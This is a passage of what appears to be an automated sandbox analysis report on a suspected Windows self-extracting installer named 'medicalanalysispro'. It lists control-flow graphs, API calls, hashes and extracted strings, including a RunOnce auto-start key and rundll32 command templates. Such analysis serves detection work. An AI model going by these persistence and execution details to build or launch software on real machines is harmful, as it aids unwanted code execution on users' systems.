7ff7bde74435-7ff7bde74439 98->103 99->21 105 7ff7bde74447-7ff7bde7444b 102->105 106 7ff7bde7444f-7ff7bde74451 102->106 103->102 105->106 107 7ff7bde7445b-7ff7bde7447e 106->107 108 7ff7bde74453-7ff7bde74457 106->108 110 7ff7bde744d3-7ff7bde744da FreeLibrary 107->110 111 7ff7bde74480-7ff7bde74491 FreeLibrary 107->111 108->107 110->55 111->77
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                                                                                              • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$ham$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                                                                                                                              • API String ID: 2679723528-2751344469
                                                                                                                                                                                                                                                                                                              • Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                                                                                                                                                                                                                                                              • Instruction ID: da7fd650ed471fd6be34f29c8f809dd189f024f8e743ea1046d5f52b8c375c21
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60026C75A0C68386E7A8AB28E8406B9B7A4FFA6744FD41135DB4D43698FF3CE544C720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE71D28 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 183registrylibrarymemoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                                                                                              • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                                                                                                                              • API String ID: 178549006-3726664654
                                                                                                                                                                                                                                                                                                              • Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                                                                                                                                                                                                                                              • Instruction ID: 6ba694c7aa4f9e343a48f749cee2de8b612831b4abab556133121d4da73981d6
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F815136A0CB8286E798AF29E8402B9F7A5FBAAB54F845131DB4D43758EF3CD105C710
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE71684 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 350memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 144 7ff7bde71684-7ff7bde716ce 145 7ff7bde716d3-7ff7bde716dd 144->145 146 7ff7bde716f2-7ff7bde71704 145->146 147 7ff7bde716df-7ff7bde716e5 145->147 149 7ff7bde71706-7ff7bde71711 146->149 150 7ff7bde71713-7ff7bde7171a 146->150 147->146 148 7ff7bde716e7-7ff7bde716f0 147->148 148->145 148->146 151 7ff7bde7171e-7ff7bde7173c call 7ff7bde715e8 149->151 150->151 154 7ff7bde7173e 151->154 155 7ff7bde717aa-7ff7bde717c2 151->155 156 7ff7bde71741-7ff7bde71748 154->156 157 7ff7bde717c7-7ff7bde717d1 155->157 156->156 158 7ff7bde7174a-7ff7bde7174e 156->158 159 7ff7bde717e6-7ff7bde717ff call 7ff7bde77ba8 157->159 160 7ff7bde717d3-7ff7bde717d9 157->160 158->155 162 7ff7bde71750-7ff7bde71757 158->162 164 7ff7bde71804-7ff7bde71814 call 7ff7bde77d68 159->164 160->159 163 7ff7bde717db-7ff7bde717e4 160->163 165 7ff7bde7175e-7ff7bde71760 162->165 166 7ff7bde71759-7ff7bde7175c 162->166 163->157 163->159 172 7ff7bde71a1b-7ff7bde71a2b call 7ff7bde77d68 164->172 173 7ff7bde7181a-7ff7bde71847 CompareStringA 164->173 165->155 169 7ff7bde71762-7ff7bde71764 165->169 166->165 168 7ff7bde71766-7ff7bde71776 166->168 171 7ff7bde7177b-7ff7bde71785 168->171 169->155 169->168 174 7ff7bde7179a-7ff7bde717a8 171->174 175 7ff7bde71787-7ff7bde7178d 171->175 182 7ff7bde71acb-7ff7bde71ae9 LocalAlloc 172->182 183 7ff7bde71a31-7ff7bde71a5e CompareStringA 172->183 173->172 176 7ff7bde7184d-7ff7bde71861 GetFileAttributesA 173->176 174->164 175->174 177 7ff7bde7178f-7ff7bde71798 175->177 179 7ff7bde71867-7ff7bde7186f 176->179 180 7ff7bde719f3-7ff7bde719fb 176->180 177->171 177->174 179->180 184 7ff7bde71875-7ff7bde71891 call 7ff7bde715e8 179->184 185 7ff7bde71a00-7ff7bde71a16 call 7ff7bde74dcc 180->185 188 7ff7bde71aeb-7ff7bde71aff GetFileAttributesA 182->188 189 7ff7bde71aa2-7ff7bde71aad 182->189 183->182 186 7ff7bde71a60-7ff7bde71a67 183->186 198 7ff7bde718b5-7ff7bde718d1 LocalAlloc 184->198 199 7ff7bde71893-7ff7bde718b0 call 7ff7bde715e8 184->199 201 7ff7bde71bda-7ff7bde71c03 call 7ff7bde78470 185->201 191 7ff7bde71a6a-7ff7bde71a71 186->191 193 7ff7bde71b7e-7ff7bde71b88 188->193 194 7ff7bde71b01-7ff7bde71b03 188->194 189->185 191->191 196 7ff7bde71a73 191->196 197 7ff7bde71b8f-7ff7bde71b99 193->197 194->193 200 7ff7bde71b05-7ff7bde71b16 194->200 203 7ff7bde71a78-7ff7bde71a7f 196->203 204 7ff7bde71bae-7ff7bde71bb9 197->204 205 7ff7bde71b9b-7ff7bde71ba1 197->205 198->189 207 7ff7bde718d7-7ff7bde7194d GetPrivateProfileIntA GetPrivateProfileStringA 198->207 199->198 208 7ff7bde71b1d-7ff7bde71b27 200->208 203->203 210 7ff7bde71a81-7ff7bde71aa0 LocalAlloc 203->210 212 7ff7bde71bbc-7ff7bde71bcc call 7ff7bde72a6c 204->212 205->204 211 7ff7bde71ba3-7ff7bde71bac 205->211 213 7ff7bde71984-7ff7bde71993 207->213 214 7ff7bde7194f-7ff7bde7197f call 7ff7bde71008 * 2 207->214 215 7ff7bde71b3c-7ff7bde71b4d 208->215 216 7ff7bde71b29-7ff7bde71b2f 208->216 210->189 221 7ff7bde71ab2-7ff7bde71ac6 call 7ff7bde7114c 210->221 211->197 211->204 228 7ff7bde71bd1-7ff7bde71bd5 212->228 219 7ff7bde719ba 213->219 220 7ff7bde71995-7ff7bde719b8 GetShortPathNameA 213->220 214->228 215->212 218 7ff7bde71b4f-7ff7bde71b52 215->218 216->215 217 7ff7bde71b31-7ff7bde71b3a 216->217 217->208 217->215 218->212 225 7ff7bde71b54-7ff7bde71b7c call 7ff7bde71084 * 2 218->225 226 7ff7bde719c1-7ff7bde719ee call 7ff7bde7114c 219->226 220->226 221->228 225->212 226->228 228->201
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                                                                                              • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                                                                                              • API String ID: 383838535-3544074861
                                                                                                                                                                                                                                                                                                              • Opcode ID: ffd31459a5765e8bb283d5931304b093724e680e9c960acfeea798f9c59d150d
                                                                                                                                                                                                                                                                                                              • Instruction ID: f32a115410182aac958e26667de9a0bf453f7ec2e3b5cf6d122989c8d6d44959
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffd31459a5765e8bb283d5931304b093724e680e9c960acfeea798f9c59d150d
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AE19E22A0D78285EB99AF28E8402F9B7A1EB67744FD45135EB4D03799EF3DD509C320
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE766C4 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 299memorystringCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 238 7ff7bde766c4-7ff7bde76724 call 7ff7bde75050 LocalAlloc 241 7ff7bde76756-7ff7bde7676a call 7ff7bde75050 238->241 242 7ff7bde76726-7ff7bde76749 call 7ff7bde74dcc call 7ff7bde77700 238->242 247 7ff7bde7676c-7ff7bde767a3 call 7ff7bde74dcc LocalFree 241->247 248 7ff7bde767a5-7ff7bde767ea lstrcmpA LocalFree 241->248 259 7ff7bde7674f-7ff7bde76751 242->259 247->259 251 7ff7bde767ec-7ff7bde767ee 248->251 252 7ff7bde76837-7ff7bde7683d 248->252 257 7ff7bde767fb 251->257 258 7ff7bde767f0-7ff7bde767f9 251->258 254 7ff7bde76843-7ff7bde76849 252->254 255 7ff7bde76b14-7ff7bde76b38 call 7ff7bde77ac8 252->255 254->255 262 7ff7bde7684f-7ff7bde76870 GetTempPathA 254->262 261 7ff7bde76b3a-7ff7bde76b66 call 7ff7bde78470 255->261 263 7ff7bde767fe-7ff7bde7680e call 7ff7bde764e4 257->263 258->257 258->263 259->261 266 7ff7bde768ad-7ff7bde768b9 262->266 267 7ff7bde76872-7ff7bde7687e call 7ff7bde764e4 262->267 274 7ff7bde76814-7ff7bde76832 call 7ff7bde74dcc 263->274 275 7ff7bde76b0f-7ff7bde76b12 263->275 272 7ff7bde768bc-7ff7bde768bf 266->272 273 7ff7bde76883-7ff7bde76885 267->273 276 7ff7bde768c4-7ff7bde768ce 272->276 273->275 277 7ff7bde7688b-7ff7bde76895 call 7ff7bde72468 273->277 274->259 275->261 279 7ff7bde768e1-7ff7bde768f3 276->279 280 7ff7bde768d0-7ff7bde768d5 276->280 277->266 292 7ff7bde76897-7ff7bde768a7 call 7ff7bde764e4 277->292 282 7ff7bde76adb-7ff7bde76b04 GetWindowsDirectoryA call 7ff7bde76ca4 279->282 283 7ff7bde768f9-7ff7bde7690f GetDriveTypeA 279->283 280->279 281 7ff7bde768d7-7ff7bde768df 280->281 281->276 281->279 282->259 297 7ff7bde76b0a 282->297 286 7ff7bde76916-7ff7bde7692a GetFileAttributesA 283->286 287 7ff7bde76911-7ff7bde76914 283->287 290 7ff7bde76930-7ff7bde76933 286->290 291 7ff7bde769bd-7ff7bde769d0 call 7ff7bde76ca4 286->291 287->286 287->290 294 7ff7bde769ad 290->294 295 7ff7bde76935-7ff7bde7693f 290->295 303 7ff7bde769f4-7ff7bde76a00 call 7ff7bde72468 291->303 304 7ff7bde769d2-7ff7bde769de call 7ff7bde72468 291->304 292->266 292->275 299 7ff7bde769b1-7ff7bde769b8 294->299 295->299 300 7ff7bde76941-7ff7bde76953 295->300 297->272 306 7ff7bde76ad2-7ff7bde76ad5 299->306 300->299 305 7ff7bde76955-7ff7bde76981 GetDiskFreeSpaceA 300->305 314 7ff7bde76a16-7ff7bde76a3e call 7ff7bde77ba8 GetFileAttributesA 303->314 315 7ff7bde76a02-7ff7bde76a11 GetWindowsDirectoryA 303->315 304->294 313 7ff7bde769e0-7ff7bde769f2 call 7ff7bde76ca4 304->313 305->294 309 7ff7bde76983-7ff7bde769a4 MulDiv 305->309 306->282 306->283 309->294 312 7ff7bde769a6-7ff7bde769ab 309->312 312->291 312->294 313->294 313->303 320 7ff7bde76a55 314->320 321 7ff7bde76a40-7ff7bde76a53 CreateDirectoryA 314->321 315->314 322 7ff7bde76a58-7ff7bde76a5a 320->322 321->322 323 7ff7bde76a6d-7ff7bde76a8e SetFileAttributesA 322->323 324 7ff7bde76a5c-7ff7bde76a6b 322->324 325 7ff7bde76a91-7ff7bde76a9b 323->325 324->306 326 7ff7bde76a9d-7ff7bde76aa3 325->326 327 7ff7bde76aaf-7ff7bde76acc call 7ff7bde764e4 325->327 326->327 328 7ff7bde76aa5-7ff7bde76aad 326->328 327->275 331 7ff7bde76ace 327->331 328->325 328->327 331->306
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                                                                                              • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                                                                                              • API String ID: 3973824516-2740620654
                                                                                                                                                                                                                                                                                                              • Opcode ID: 5370aefea522cb39f03fcf8b6f4df44915309c228393c935e1622b285d8bbc69
                                                                                                                                                                                                                                                                                                              • Instruction ID: 827908da1cff5985adab10b5f07736abdfd23bca2809b217528b49469e30abd1
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5370aefea522cb39f03fcf8b6f4df44915309c228393c935e1622b285d8bbc69
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCD14421A1C68286EBD8AB28D4502BAF7A1FFA7748FD44139DB4D43699EF3DD405C720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE72DB4 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 179synchronizationCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 332 7ff7bde72db4-7ff7bde72e4d call 7ff7bde78b09 memset * 2 call 7ff7bde75050 337 7ff7bde730a5 332->337 338 7ff7bde72e53-7ff7bde72e94 CreateEventA SetEvent call 7ff7bde75050 332->338 340 7ff7bde730aa-7ff7bde730b9 call 7ff7bde74dcc 337->340 343 7ff7bde72e96-7ff7bde72ea0 338->343 344 7ff7bde72ec3-7ff7bde72ecb 338->344 345 7ff7bde730be 340->345 346 7ff7bde72ea2-7ff7bde72ebe call 7ff7bde74dcc 343->346 348 7ff7bde72ecd-7ff7bde72ecf 344->348 349 7ff7bde72ed5-7ff7bde72ef0 call 7ff7bde75050 344->349 347 7ff7bde730c0-7ff7bde730e3 call 7ff7bde78470 345->347 346->345 348->349 352 7ff7bde72fa3-7ff7bde72fb3 call 7ff7bde770a8 348->352 359 7ff7bde72efe-7ff7bde72f1c CreateMutexA 349->359 360 7ff7bde72ef2-7ff7bde72efc 349->360 362 7ff7bde72fb5-7ff7bde72fbf 352->362 363 7ff7bde72fc4-7ff7bde72fcb 352->363 359->352 361 7ff7bde72f22-7ff7bde72f33 GetLastError 359->361 360->346 361->352 364 7ff7bde72f35-7ff7bde72f48 361->364 362->340 365 7ff7bde72fcd-7ff7bde72fd9 call 7ff7bde7204c 363->365 366 7ff7bde72fde-7ff7bde72ffd FindResourceExA 363->366 368 7ff7bde72f4a-7ff7bde72f60 call 7ff7bde74dcc 364->368 369 7ff7bde72f62-7ff7bde72f7f call 7ff7bde74dcc 364->369 365->345 370 7ff7bde73014-7ff7bde7301b 366->370 371 7ff7bde72fff-7ff7bde73011 LoadResource 366->371 381 7ff7bde72f81-7ff7bde72f9e CloseHandle 368->381 369->352 369->381 374 7ff7bde7301d-7ff7bde73024 #17 370->374 375 7ff7bde73029-7ff7bde73030 370->375 371->370 374->375 378 7ff7bde7303a-7ff7bde73044 call 7ff7bde73bf4 375->378 379 7ff7bde73032-7ff7bde73035 375->379 378->345 384 7ff7bde73046-7ff7bde73055 378->384 379->347 381->345 384->379 385 7ff7bde73057-7ff7bde73061 384->385 385->379 386 7ff7bde73063-7ff7bde7306a 385->386 386->379 387 7ff7bde7306c-7ff7bde73073 call 7ff7bde712ec 386->387 387->379 390 7ff7bde73075-7ff7bde730a1 call 7ff7bde77ac8 387->390 390->345 393 7ff7bde730a3 390->393 393->379
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                                                                                                                                                                                                                                                              • String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$ham
                                                                                                                                                                                                                                                                                                              • API String ID: 3100096412-71271436
                                                                                                                                                                                                                                                                                                              • Opcode ID: 7fc7f578be530f482524e13d1538833715e790512501b6b919f004c900bcfea5
                                                                                                                                                                                                                                                                                                              • Instruction ID: de94d1b065d2d38a606c88ab858b302341a8420a42be1418f7ecf65b1b2e0ef5
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7fc7f578be530f482524e13d1538833715e790512501b6b919f004c900bcfea5
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34815931A0C64386F7E9BB29A8107B9E6A0EFA7744FC45035DB4D426ADEF7CA445C720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE76CA4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215windowCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 394 7ff7bde76ca4-7ff7bde76d10 GetCurrentDirectoryA SetCurrentDirectoryA 395 7ff7bde76d12-7ff7bde76d3a call 7ff7bde74dcc call 7ff7bde77700 394->395 396 7ff7bde76d3f-7ff7bde76d7a GetDiskFreeSpaceA 394->396 411 7ff7bde76fe9 395->411 398 7ff7bde76f63-7ff7bde76fb8 memset call 7ff7bde77700 GetLastError FormatMessageA 396->398 399 7ff7bde76d80-7ff7bde76da8 MulDiv 396->399 408 7ff7bde76fbd-7ff7bde76fe4 call 7ff7bde74dcc SetCurrentDirectoryA 398->408 399->398 402 7ff7bde76dae-7ff7bde76de4 GetVolumeInformationA 399->402 405 7ff7bde76e45-7ff7bde76e68 SetCurrentDirectoryA 402->405 406 7ff7bde76de6-7ff7bde76e40 memset call 7ff7bde77700 GetLastError FormatMessageA 402->406 410 7ff7bde76e6c-7ff7bde76e73 405->410 406->408 408->411 414 7ff7bde76e75-7ff7bde76e7a 410->414 415 7ff7bde76e86-7ff7bde76e99 410->415 418 7ff7bde76feb-7ff7bde7701a call 7ff7bde78470 411->418 414->415 419 7ff7bde76e7c-7ff7bde76e84 414->419 416 7ff7bde76e9d-7ff7bde76ea0 415->416 420 7ff7bde76eae-7ff7bde76eb2 416->420 421 7ff7bde76ea2-7ff7bde76eac 416->421 419->410 419->415 423 7ff7bde76ed8-7ff7bde76edf 420->423 424 7ff7bde76eb4-7ff7bde76ed3 call 7ff7bde74dcc 420->424 421->416 421->420 427 7ff7bde76f0e-7ff7bde76f1f 423->427 428 7ff7bde76ee1-7ff7bde76ee9 423->428 424->411 431 7ff7bde76f22-7ff7bde76f2a 427->431 428->427 430 7ff7bde76eeb-7ff7bde76f0c 428->430 430->431 432 7ff7bde76f2c-7ff7bde76f30 431->432 433 7ff7bde76f46-7ff7bde76f49 431->433 436 7ff7bde76f32 432->436 434 7ff7bde76f4b-7ff7bde76f4d 433->434 435 7ff7bde76f4f-7ff7bde76f52 433->435 434->436 435->436 437 7ff7bde76f54-7ff7bde76f5e 436->437 438 7ff7bde76f34-7ff7bde76f41 call 7ff7bde724f8 436->438 437->418 438->418
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                                                                              • API String ID: 4237285672-305352358
                                                                                                                                                                                                                                                                                                              • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                                                                                                                                                                                                                              • Instruction ID: 0a4b4ae5ee6eb911a07e225d1cc786827bdbd352b4223fc1b23dbd2051179694
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67A17436A1C74287E7A8AF28E4406AAFBA0FB9A748F844135DB4D43758EF3CD445CB10
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE75D90 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 124windowCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                                                                                              • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                                                                                              • API String ID: 1305606123-2642027498
